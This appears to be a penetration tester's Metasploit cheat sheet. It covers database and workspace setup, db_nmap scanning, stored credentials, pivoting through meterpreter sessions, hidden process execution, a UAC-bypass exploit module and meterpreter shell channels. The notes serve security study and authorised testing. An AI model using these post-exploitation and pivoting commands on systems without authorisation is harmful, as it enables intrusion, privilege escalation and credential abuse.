# Create PostgreSQL database:
$ sudo msfdb init

# Enable Postgre:
$ sudo systemctl enable postgresql

# Check status:
msf6 > db_status

======================
WORKSPACES
======================
# Workspaces can store assessments for different targets, so we don't mix it up:
# Check workspaces:
msf6 > workspace
* default
# Add workspace:
msf6 > workspace -a offsec
[*] Added workspace: offsec
[*] Workspace: offsec

# We can use DB_NMap tool to store info about the pentest:
msf6 > db_nmap -A 10.0.0.1

# Now we can check hosts:
msf6 > hosts

# Now we can check services:
msf6 > services
# Optionally we can select ports:
msf6 > services -p 445

# set as RHosts all services with port 445:
services -p 445 --rhosts

# Check for creds already bruteforced:
creds
========================

========================
PIVOTING
========================
# Add route to internal network 172.16.89.0 to meterpreter session 17:
route add 172.16.89.0/24 17
route print

# Now we can use portscan aux to scan internal network through meterpreter session:
use auxiliary/scanner/portscan/tcp

# AutoRoute to meterpreter session 18:
use multi/manage/autoroute
set session 18
run
========================

======================
MSF USAGE
======================
search type:auxiliary smb

# create process hidden from view:
execute -H -f notepad

# list availabley payloads for win 64:
msfvenom -l payloads --platform windows --arch x64

# set as RHosts all services with port 445:
services -p 445 --rhosts

# Check for possibly vulns from the module:
vulns

# Bypass UAC at powershell:
use exploit/windows/local/bypassuac_sdclt

# We can interact with differnet shells and put them on background using Channels:
======================
meterpreter > shell
Process 196 created.
Channel 2 created.
whoami
daemon
^Z
Background channel 2? [y/N]  y
meterpreter > channel -l

    Id  Class  Type
    --  -----  ----
    1   3      stdapi_process
    2   3      stdapi_process

meterpreter > channel -i 1
Interacting with channel 1...

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
======================

